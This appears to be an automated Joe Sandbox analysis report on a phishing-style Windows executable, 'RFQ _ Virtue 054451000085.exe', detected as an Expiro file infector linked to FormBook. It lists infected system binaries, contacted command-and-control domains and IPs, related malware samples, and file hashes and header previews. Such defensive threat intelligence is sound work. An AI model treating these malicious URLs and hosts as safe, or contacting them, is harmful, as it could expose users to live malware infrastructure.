Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	412 Process Injection	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
RFQ _ Virtue 054451000085.exe	82%	ReversingLabs	Win32.Virus.Expiro
RFQ _ Virtue 054451000085.exe	75%	Virustotal		Browse
RFQ _ Virtue 054451000085.exe	100%	Avira	W32/Infector.Gen
RFQ _ Virtue 054451000085.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	100%	Avira	W32/Infector.Gen
C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	100%	Avira	W32/Infector.Gen
C:\Windows\System32\AppVClient.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	100%	Avira	W32/Infector.Gen
C:\Windows\System32\FXSSVC.exe	100%	Avira	W32/Infector.Gen
C:\Windows\System32\alg.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	100%	Joe Sandbox ML
C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	100%	Joe Sandbox ML
C:\Windows\System32\AppVClient.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	100%	Joe Sandbox ML
C:\Windows\System32\FXSSVC.exe	100%	Joe Sandbox ML
C:\Windows\System32\alg.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.snyp.shop/4nyz/	0%	Avira URL Cloud	safe
http://54.244.188.177/h	100%	Avira URL Cloud	phishing
https://whois.gandi.net/en/results?search=sunnyz.store	0%	Avira URL Cloud	safe
http://www.duwixushx.xyz/u11p/	100%	Avira URL Cloud	malware
http://54.244.188.177/yjbljodlunyhsT	0%	Avira URL Cloud	safe
http://54.244.188.177/yjbljodlunyh	0%	Avira URL Cloud	safe
http://18.141.10.107:80/punqdgkybis	0%	Avira URL Cloud	safe
http://www.8312zcksnu.bond/d3gs/	0%	Avira URL Cloud	safe
http://18.141.10.107/punqdgkybi	0%	Avira URL Cloud	safe
http://18.141.10.107/=	0%	Avira URL Cloud	safe
https://shksj.sdnasj.nduau.cn/123.html	0%	Avira URL Cloud	safe
http://www.d48dk.top/9ffw/	0%	Avira URL Cloud	safe
http://18.141.10.107/punqdgkybiS	0%	Avira URL Cloud	safe
http://18.141.10.107/punqdgkybi-8	0%	Avira URL Cloud	safe
http://www.duwixushx.xyz	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
webredir.vip.gandi.net	217.70.184.50	true	false	high
www.snyp.shop	13.248.169.48	true	true	unknown
d48dk.top	154.23.184.207	true	true	unknown
www.8312zcksnu.bond	38.165.29.234	true	true	unknown
ssbzmoy.biz	18.141.10.107	true	false	high
fwiwk.biz	172.234.222.143	true	false	high
pywolwnvd.biz	54.244.188.177	true	false	high
www.duwixushx.xyz	156.251.17.224	true	false	high
www.sunnyz.store	unknown	unknown	false	unknown
www.d48dk.top	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://pywolwnvd.biz/jigtx	false		high
http://ssbzmoy.biz/punqdgkybi	false		high
http://www.snyp.shop/4nyz/	true	Avira URL Cloud: safe	unknown
http://cvgrf.biz/rtjcy	false		high
http://www.8312zcksnu.bond/d3gs/	true	Avira URL Cloud: safe	unknown
http://ssbzmoy.biz/s	false		high
http://knjghuig.biz/rrxdfrjngeyag	false		high
http://vcddkls.biz/gepvpveyhkiwwmj	false		high
http://www.duwixushx.xyz/u11p/	true	Avira URL Cloud: malware	unknown
http://pywolwnvd.biz/yjbljodlunyh	false		high
http://www.d48dk.top/9ffw/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	choice.exe, 00000010.00000002.2755534033.0000000007458000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	choice.exe, 00000010.00000002.2755534033.0000000007458000.00000004.00000020.00020000.00000000.sdmp	false		high
http://pywolwnvd.biz/	RFQ _ Virtue 054451000085.exe, 00000000.00000002.1541118228.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://18.141.10.107:80/punqdgkybis	RFQ _ Virtue 054451000085.exe, 00000000.00000002.1541118228.0000000000CEA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	choice.exe, 00000010.00000002.2755534033.0000000007458000.00000004.00000020.00020000.00000000.sdmp	false		high
https://whois.gandi.net/en/results?search=sunnyz.store	choice.exe, 00000010.00000002.2752942454.0000000004E14000.00000004.10000000.00040000.00000000.sdmp, choice.exe, 00000010.00000002.2754801840.0000000007100000.00000004.00000800.00020000.00000000.sdmp, iavbXasnTxCeiF.exe, 00000011.00000002.2751956127.0000000003154000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000013.00000002.2285612924.00000000012C4000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	choice.exe, 00000010.00000002.2755534033.0000000007458000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.gandi.net/en/domain	choice.exe, 00000010.00000002.2752942454.0000000004E14000.00000004.10000000.00040000.00000000.sdmp, choice.exe, 00000010.00000002.2754801840.0000000007100000.00000004.00000800.00020000.00000000.sdmp, iavbXasnTxCeiF.exe, 00000011.00000002.2751956127.0000000003154000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000013.00000002.2285612924.00000000012C4000.00000004.80000000.00040000.00000000.sdmp	false		high
http://54.244.188.177/h	RFQ _ Virtue 054451000085.exe, 00000000.00000003.1526907938.0000000000CD9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://www.ecosia.org/newtab/	choice.exe, 00000010.00000002.2755534033.0000000007458000.00000004.00000020.00020000.00000000.sdmp	false		high
http://54.244.188.177/yjbljodlunyh	RFQ _ Virtue 054451000085.exe, 00000000.00000003.1526907938.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, RFQ _ Virtue 054451000085.exe, 00000000.00000002.1541530686.0000000000D04000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://18.141.10.107/	RFQ _ Virtue 054451000085.exe, 00000000.00000002.1541118228.0000000000CD9000.00000004.00000020.00020000.00000000.sdmp	false		high
http://18.141.10.107/=	RFQ _ Virtue 054451000085.exe, 00000000.00000002.1541118228.0000000000CD9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	choice.exe, 00000010.00000002.2755534033.0000000007458000.00000004.00000020.00020000.00000000.sdmp	false		high
http://54.244.188.177/yjbljodlunyhsT	RFQ _ Virtue 054451000085.exe, 00000000.00000002.1541530686.0000000000D04000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://hm.baidu.com/hm.js?74a9aceb7cac25dafa7a0b15cd8b5c9d	choice.exe, 00000010.00000002.2752942454.0000000005138000.00000004.10000000.00040000.00000000.sdmp, iavbXasnTxCeiF.exe, 00000011.00000002.2751956127.0000000003478000.00000004.00000001.00040000.00000000.sdmp	false		high
https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilith	elevation_service.exe.0.dr	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	choice.exe, 00000010.00000002.2755534033.0000000007458000.00000004.00000020.00020000.00000000.sdmp	false		high
http://18.141.10.107/punqdgkybi	RFQ _ Virtue 054451000085.exe, 00000000.00000002.1541118228.0000000000CEA000.00000004.00000020.00020000.00000000.sdmp, RFQ _ Virtue 054451000085.exe, 00000000.00000002.1541665459.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://shksj.sdnasj.nduau.cn/123.html	choice.exe, 00000010.00000002.2752942454.0000000005138000.00000004.10000000.00040000.00000000.sdmp, choice.exe, 00000010.00000002.2754801840.0000000007100000.00000004.00000800.00020000.00000000.sdmp, iavbXasnTxCeiF.exe, 00000011.00000002.2751956127.0000000003478000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://18.141.10.107/punqdgkybiS	RFQ _ Virtue 054451000085.exe, 00000000.00000002.1541118228.0000000000CD9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	choice.exe, 00000010.00000002.2755534033.0000000007458000.00000004.00000020.00020000.00000000.sdmp	false		high
http://18.141.10.107/punqdgkybi-8	RFQ _ Virtue 054451000085.exe, 00000000.00000002.1541665459.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.duwixushx.xyz	iavbXasnTxCeiF.exe, 00000011.00000002.2753929696.000000000520D000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ff	elevation_service.exe.0.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
13.248.169.48	www.snyp.shop	United States	16509	AMAZON-02US	true
156.251.17.224	www.duwixushx.xyz	Seychelles	132839	POWERLINE-AS-APPOWERLINEDATACENTERHK	false
38.165.29.234	www.8312zcksnu.bond	United States	174	COGENT-174US	true
54.244.188.177	pywolwnvd.biz	United States	16509	AMAZON-02US	false
217.70.184.50	webredir.vip.gandi.net	France	29169	GANDI-ASDomainnameregistrar-httpwwwgandinetFR	false
154.23.184.207	d48dk.top	United States	174	COGENT-174US	true
18.141.10.107	ssbzmoy.biz	United States	16509	AMAZON-02US	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1571270
Start date and time:	2024-12-09 08:30:15 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	3
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	RFQ _ Virtue 054451000085.exe
Detection:	MAL
Classification:	mal100.spre.troj.spyw.expl.evad.winEXE@12/13@10/7
EGA Information:	Successful, ratio: 80%
HCA Information:	Successful, ratio: 65% Number of executed functions: 62 Number of non-executed functions: 248
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, DiagnosticsHub.StandardCollector.Service.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): przvgke.biz, ww7.przvgke.biz, zlenh.biz, slscr.update.microsoft.com, otelrules.azureedge.net, knjghuig.biz, vjaxhpbji.biz, ctldl.windowsupdate.com, ifsaia.biz, uhxqin.biz, fe3cr.delivery.mp.microsoft.com, ww12.przvgke.biz, cvgrf.biz, ww99.przvgke.biz, lpuegx.biz, saytjshyf.biz, xlfhhhm.biz, vcddkls.biz, npukfztj.biz, anpmnmxo.biz
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.

Simulations

Behavior and APIs

Time	Type	Description
02:31:40	API Interceptor	1x Sleep call for process: RFQ _ Virtue 054451000085.exe modified
02:32:59	API Interceptor	732370x Sleep call for process: choice.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
13.248.169.48	NEW.RFQ00876.pdf.exe	Get hash	malicious	FormBook	Browse	www.krshop.shop/5p01/
	DHL_734825510.exe	Get hash	malicious	FormBook	Browse	www.egyshare.xyz/440l/
	purchase order.exe	Get hash	malicious	FormBook	Browse	www.aktmarket.xyz/wb7v/
	SRT68.exe	Get hash	malicious	FormBook	Browse	www.avalanchefi.xyz/vxa5/
	ek8LkB2Cgo.exe	Get hash	malicious	FormBook	Browse	www.remedies.pro/4azw/
	Document_084462.scr.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.optimismbank.xyz/98j3/?2O=jo1iJOnj8ueGZPJDfvyWmhhX4bGAJjt1DdtSaCSQL5v3UEYBE5VATgnqgu9yCYXU1qT81UG2HbOLQLBbZNDoJaqiWagLaQ4MrpZVJnF4w7w/HKU2baOdEb4=&ChhG6=J-xs
	Pp7OXMFwqhXKx5Y.exe	Get hash	malicious	FormBook	Browse	www.smartgov.shop/1cwp/
	SW_5724.exe	Get hash	malicious	FormBook	Browse	www.egyshare.xyz/440l/
	attached invoice.exe	Get hash	malicious	FormBook	Browse	www.aktmarket.xyz/wb7v/
	YH-3-12-2024-GDL Units - Projects.exe	Get hash	malicious	FormBook	Browse	www.tals.xyz/k1td/
156.251.17.224	ek8LkB2Cgo.exe	Get hash	malicious	FormBook	Browse	www.duwixushx.xyz/fyc8/
	PO 4110007694.exe	Get hash	malicious	FormBook	Browse	www.duwixushx.xyz/q0vk/
	OUTSTANDING BALANCE PAYMENT.exe	Get hash	malicious	FormBook	Browse	www.duwixushx.xyz/q0vk/
	DOC_114542366.vbe	Get hash	malicious	FormBook	Browse	www.duwixushx.xyz/bmve/?Wno=a0qDq&KV=Rsosln+CouPFD70pouDpcL8MGxlXnptR0Qz9VzezY2yTYUIF1+nb00CRzlZGPtlDISGdoNhQK1cGxL7iAKAdT88wJdzRXyyanezdQrBbCEm548OmpMr0744=
54.244.188.177	OgkJOmobY7.exe	Get hash	malicious	FormBook	Browse	pywolwnvd.biz/hemfkj
	Ziraat_Swift.hta	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	pywolwnvd.biz/nwqf
	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Get hash	malicious	AgentTesla, MassLogger RAT, PureLog Stealer	Browse	cvgrf.biz/yqmdwhskkjhif
	invoice_96.73.exe	Get hash	malicious	FormBook	Browse	lrxdmhrr.biz/tgcwttfqletfhyq
	Order SMG 201906 20190816order.pdf.scr.exe	Get hash	malicious	AgentTesla, MassLogger RAT, PureLog Stealer	Browse	rynmcq.biz/msoqwwrwyts
	C6dAUcOA6M.exe	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	rynmcq.biz/qqnj
	PO #09465610_GQ 003745_SO-242000846.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	pywolwnvd.biz/ksmybghbmbq
	IBKB.vbs	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	lrxdmhrr.biz/wt
	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	rynmcq.biz/qwi
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	ecxbwt.biz/brgveksk

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
webredir.vip.gandi.net	QUOTATON-37839993.exe	Get hash	malicious	FormBook	Browse	217.70.184.50
	PO# 81136575.exe	Get hash	malicious	DarkTortilla, FormBook	Browse	217.70.184.50
	Order No 24.exe	Get hash	malicious	FormBook	Browse	217.70.184.50
	RFQ.exe	Get hash	malicious	FormBook	Browse	217.70.184.50
	statement of accounts.exe	Get hash	malicious	FormBook	Browse	217.70.184.50
	RFQ.exe	Get hash	malicious	FormBook	Browse	217.70.184.50
	RFQ.exe	Get hash	malicious	FormBook	Browse	217.70.184.50
	XhAQ0Rk63O.exe	Get hash	malicious	FormBook	Browse	217.70.184.50
	SWIFT.exe	Get hash	malicious	FormBook	Browse	217.70.184.50
	#10302024.exe	Get hash	malicious	FormBook	Browse	217.70.184.50
ssbzmoy.biz	Ziraat_Swift.hta	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	18.141.10.107
	RFQ_PO N89397-GM7287-Order.bat.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	18.141.10.107
	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Get hash	malicious	AgentTesla, MassLogger RAT, PureLog Stealer	Browse	18.141.10.107
	invoice_96.73.exe	Get hash	malicious	FormBook	Browse	18.141.10.107
	Order SMG 201906 20190816order.pdf.scr.exe	Get hash	malicious	AgentTesla, MassLogger RAT, PureLog Stealer	Browse	18.141.10.107
	C6dAUcOA6M.exe	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	18.141.10.107
	PO #09465610_GQ 003745_SO-242000846.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	18.141.10.107
	IBKB.vbs	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	18.141.10.107
	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	18.141.10.107
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	18.141.10.107

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
COGENT-174US	jew.mips.elf	Get hash	malicious	Unknown	Browse	38.181.75.57
	jew.ppc.elf	Get hash	malicious	Unknown	Browse	38.10.205.247
	sora.sh4.elf	Get hash	malicious	Mirai	Browse	38.58.80.48
	sora.mips.elf	Get hash	malicious	Mirai	Browse	154.62.162.19
	sora.mpsl.elf	Get hash	malicious	Mirai	Browse	38.1.0.131
	sora.arm.elf	Get hash	malicious	Mirai	Browse	38.83.59.58
	meerkat.arm5.elf	Get hash	malicious	Mirai	Browse	38.138.245.245
	meerkat.x86.elf	Get hash	malicious	Mirai	Browse	154.12.143.89
	SpyHunter-5.18-5-6605-Installer.exe	Get hash	malicious	Unknown	Browse	143.244.49.179
	arm5.elf	Get hash	malicious	Unknown	Browse	206.3.145.188
AMAZON-02US	boatnet.arm.elf	Get hash	malicious	Mirai	Browse	54.171.230.55
	boatnet.arm7.elf	Get hash	malicious	Mirai	Browse	54.171.230.55
	boatnet.arm5.elf	Get hash	malicious	Mirai	Browse	54.171.230.55
	cllmxIZWcQ.lnk	Get hash	malicious	Unknown	Browse	3.5.167.250
	qhjKN40R2Q.lnk	Get hash	malicious	Unknown	Browse	52.95.134.150
	NEW.RFQ00876.pdf.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	jew.arm5.elf	Get hash	malicious	Mirai	Browse	54.171.230.55
	jew.m68k.elf	Get hash	malicious	Unknown	Browse	18.162.175.118
	jew.mips.elf	Get hash	malicious	Unknown	Browse	18.241.248.28
	jew.ppc.elf	Get hash	malicious	Unknown	Browse	13.122.1.68
POWERLINE-AS-APPOWERLINEDATACENTERHK	DHL 40312052024.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	DHL 30312052024.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	nshsh4.elf	Get hash	malicious	Mirai	Browse	156.251.3.5
	i586.elf	Get hash	malicious	Gafgyt, Mirai	Browse	156.251.7.145
	armv4l.elf	Get hash	malicious	Gafgyt, Mirai	Browse	156.244.234.130
	ex86.elf	Get hash	malicious	Mirai	Browse	156.244.234.110
	armv6l.elf	Get hash	malicious	Gafgyt, Mirai	Browse	156.242.206.57
	mipsel.elf	Get hash	malicious	Gafgyt, Mirai	Browse	156.251.7.126
	ek8LkB2Cgo.exe	Get hash	malicious	FormBook	Browse	156.251.17.224
	PO 4110007694.exe	Get hash	malicious	FormBook	Browse	156.251.17.224

Process:	C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1658880
Entropy (8bit):	4.312994353570942
Encrypted:	false
SSDEEP:	24576:lxGBcmlqVg9N9JMlDlfjRiVuVsWt5MJMs:LGy+2gFIDRRAubt5M
MD5:	785A052E614E12F8A62CD368B4273290
SHA1:	96348E8B295953806D6D1C3AC11620D6359DD0FD
SHA-256:	E9322F5BAD853B73C135D17094443BADE37556944ABB31D37B20E58488CFB880
SHA-512:	E0DE851739BC2FC3F0A006B621700183AFE9C18F15DE2571ECB80BADDD6629EE44487605597E880575F55393F72C7A689348D5096A3BDCF0CB947A59905860B7
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@.........................................................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...............`..............@...........................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe

Download File

Process:	C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	modified
Size (bytes):	2935808
Entropy (8bit):	7.304427912540143
Encrypted:	false
SSDEEP:	49152:UhDdVrQ95RW0Y9HyWQXE/09Val0GIgFIDRRAubt5MDgFIDRRAubt5M:UhHYWLHyWKuUffUf
MD5:	4A75CEF77A853151229868A922272694
SHA1:	E54D2173247289E4EE513F8B7FE170CBC180091D
SHA-256:	D85563C197D2E9C2B0F9C18FAF262D197C121D240789F3A3023A11CBD300D413
SHA-512:	57A921D571CF1741C9AF8EC20613DEE69C41FB1287399C9055748DBCD0647A30FD16EAEB5E79B9EBD87DBA3198BBACA7EE8D62DF2FA9F2A304BF5EDFF76879F7
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......2...........b.........@.............................@.......F-... .........................................p%......>).......@..................................8.......................(....c..@........... 0..P............................text....0.......2.................. ..`.rdata.......P.......6..............@..@.data...4...........................@....pdata..............................@..@.00cfg..0...........................@..@.gxfg............0..................@..@.retplne.................................tls....!...........................@..._RDATA..\.... ......................@..@malloc_h.....0...................... ..`.rsrc........@......................@..@.reloc.......`......................@...........................................................................................................................................

C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log

Download File

Process:	C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3141
Entropy (8bit):	4.85793594555096
Encrypted:	false
SSDEEP:	24:l2dwQrbeP4BrRzRWtFgRWmIFW1w3JuPhRWqFwvRxRWlbFRW07F9vWYRWqNFRq4+0:4WCRodm3qbZq4Fq8vtnSD
MD5:	5E9C7BA14306F00A09F7A8EB122E3D13
SHA1:	A29B95AA46C6C72DDCF5F61FD04807649A8C9943
SHA-256:	FF31D37DCE343DFFDFC6DEF1ACE1EA247BDC0F2C01AC176A1304608D434A91B3
SHA-512:	FF1C59B73D41686A1691F164D56395703D1CFD9A513BDAA00A099C6D846CA8B4DEC08A9F2D2093D244BC9B2C1E0FEFF9973AAA2D556C2B53F18A2B39C869E26A
Malicious:	false
Preview:	2024-12-09 02:31:42-0500: Disabled unneeded token privilege: SeAssignPrimaryTokenPrivilege...2024-12-09 02:31:42-0500: Disabled unneeded token privilege: SeAuditPrivilege...2024-12-09 02:31:42-0500: Disabled unneeded token privilege: SeBackupPrivilege...2024-12-09 02:31:42-0500: Disabled unneeded token privilege: SeCreateGlobalPrivilege...2024-12-09 02:31:42-0500: Disabled unneeded token privilege: SeCreatePagefilePrivilege...2024-12-09 02:31:42-0500: Disabled unneeded token privilege: SeCreatePermanentPrivilege...2024-12-09 02:31:42-0500: Disabled unneeded token privilege: SeCreateSymbolicLinkPrivilege...2024-12-09 02:31:42-0500: Could not disable token privilege value: SeCreateTokenPrivilege. (1300)..2024-12-09 02:31:42-0500: Disabled unneeded token privilege: SeDebugPrivilege...2024-12-09 02:31:42-0500: Could not disable token privilege value: SeEnableDelegationPrivilege. (1300)..2024-12-09 02:31:42-0500: Disabled unneeded token privilege: SeImpersonatePrivilege...2024-12-09 02:31:4

C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exe

Download File

Process:	C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2370560
Entropy (8bit):	7.031534747100036
Encrypted:	false
SSDEEP:	49152:/AMsOu3JfCIGnZuTodRFYKBrFxbWpOgFIDRRAubt5M:/AMa38ZuTSQUf
MD5:	AD10BDCC2029A8A94C27D7B63CE8E80D
SHA1:	ABD3C327E6369B94540F922BFD008176A13F1DD0
SHA-256:	D8ED79C7F503C488DA4148776C3A9E89D1FB1E810DF8751851D7F9AE3F0ECEB0
SHA-512:	24FADE3675419245D90246758A384E52244E6EAFE2AEF27377C026DB3A7868A1EFD26B1DB5E58B5DC915824B8AA3EF76F67820DD0C35CABD81A676EFD5C17A08
Malicious:	true
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....\|.e..........".................0..........@..............................%.....*.%... ..........................................}..Z...Z}...............@..`...................$k.......................j..(.......@............... ............................text...V........................... ..`.rdata..Hv.......x..................@..@.data...t....`.......>..............@....pdata..`....@.......6..............@..@.00cfg..0...........................@..@.gxfg....+.......,..................@..@.retplne.....@...........................tls....A....P......................@..._RDATA..\....`....... ..............@..@malloc_h.....p.......".............. ..`.rsrc................$..............@..@.reloc...............<..............@...........................................................................................................................................

C:\Users\user\AppData\Local\Temp\G109m407

Download File

Process:	C:\Windows\SysWOW64\choice.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	modified
Size (bytes):	196608
Entropy (8bit):	1.1215420383712111
Encrypted:	false
SSDEEP:	384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5:	9A809AD8B1FDDA60760BB6253358A1DB
SHA1:	D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256:	95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512:	2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\aut8E66.tmp

Download File

Process:	C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe
File Type:	data
Category:	dropped
Size (bytes):	288768
Entropy (8bit):	7.994271917855947
Encrypted:	true
SSDEEP:	6144:mntWSXlPqqOC/jw8jxCI0jIXLKNq2p7iwZbtdH6ItEZR2A:jS1PqqOC7w8jCjIXOY87iUvagYR5
MD5:	E718A5652D2AB4800966589D11B88460
SHA1:	10C93CAF35DD75589C1A703E0C41C23D93F0C4D8
SHA-256:	A3AC7B5CB62E86D7804C24A82CE97B7CBBFDA0E0A9B64C50845BCF3A14CDDD97
SHA-512:	2C164D375457E187968098AD5D61206E117B2EFC2E0655E6C79F5B7A2AD44C065E02AA18A1CC05D7B5F8945D9C22457F9078BDB90594F97133BA99F88B71105F
Malicious:	false
